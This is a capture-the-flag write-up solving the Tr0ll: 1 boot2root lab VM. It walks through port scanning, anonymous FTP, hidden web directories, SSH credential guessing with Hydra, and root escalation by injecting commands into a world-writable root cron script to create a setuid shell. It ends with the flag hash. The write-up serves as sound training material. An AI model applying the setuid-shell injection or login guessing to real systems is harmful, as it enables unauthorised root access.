published on in writeup
tags: tr0ll

Tr0ll: 1

Tr0ll is a boot2root, from Maleus. It was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!

Nmap

[email protected]:~# nmap -n -A -p- 192.168.127.103
 
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).

Starting from the top, anonymous FTP login is permitted and Nmap has listed the root directory. I logged in manually and downloaded lol.pcap.

[email protected]:~/vuln/tr0ll# strings lol.pcap
[...snip...]
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!

Having a look around the Apache service reveals a few friendly images.

Other tools such as nikto didn’t turn up anything more. After a little pondering I decided to try sup3rs3cr3tdirlol as a directory in the URL, and was presented with the following page:

I downlaoded roflmao which turned out to be a binary file, which doesn’t appear to do anything more than print the following message:

Find address 0x0856BF to proceed

This has the potential to send you on a massive goose chase, but I was now thinking like a proper troll :p. Address… Web address…?

Heh, nice. These directories contain the following files:

Index of /0x0856BF/good_luck
[TXT]     which_one_lol.txt     2014-08-09 23:32      109
 
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Index of /0x0856BF/this_folder_contains_the_password
[TXT]     Pass.txt     2014-08-09 23:18      12 
 
Good_job_:)

I took the list in which_one_lol.txt and used it as potential usernames, and the string Good_job_:) as a password. I then ran this through Hydra to try my luck against SSH. Unfortunately, it seems that after about 7-8 incorrect logins, the SSH service closes for a while before coming back up. Hydra doesn’t seem to save its session when this happens, so carrying on after the service comes back up didn’t seem possible. To this end, I just tried the logins manually, since there weren’t actually that many.

However, this password was not valid for any of these accounts :(

More trolls however - if we recall the name of the directory, this_folder_contains_the_password. What’s in that folder? Pass.txt. Try the filename as a password…?

I finally got a successful login with overflow:Pass.txt. Woop.

SSH

I started some basic enumeration until this happened:

Broadcast Message from [email protected]                                              
        (somewhere) at 9:20 ...                                               
 
TIMES UP LOL!                                                                 
 
Connection to 192.168.127.103 closed by remote host.

Oh for God sake, haha - this seems to happen every five minutes or so, but you can just reconnect each time.

I got a hit whilst searching for world-writeable files.

find / -perm -0002 -type f -print
[...snip...]
/lib/log/cleaner.py
 
-rwxrwxrwx 1 root root 96 Aug 13 00:13 /lib/log/cleaner.py

A world-writeable script owned by root? Jackpot (rasta_mouse braces himself for more trolls)…

#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()

I simply added two new lines to this.

os.system('cp /bin/sh /tmp/sh')
os.system('chmod 4777 /tmp/sh')

I waited a few minutes and eventually my shell turned up!

-rwxrwxrwx 1 root root 112204 Aug 29 10:31 sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# whoami
root

Flag

From here, you can cat the flag.

# cat root/proof.txt
Good job, you did it!
 
702a8c18d29c6f3ca0d99ef5712bfbdc

I also wanted to take a look at the automated processes going on, so here they are.

*/5 * * * * /usr/bin/python /opt/lmao.py
*/2 * * * * /usr/bin/python /lib/log/cleaner.py
#!/usr/bin/env python
import os
 
os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()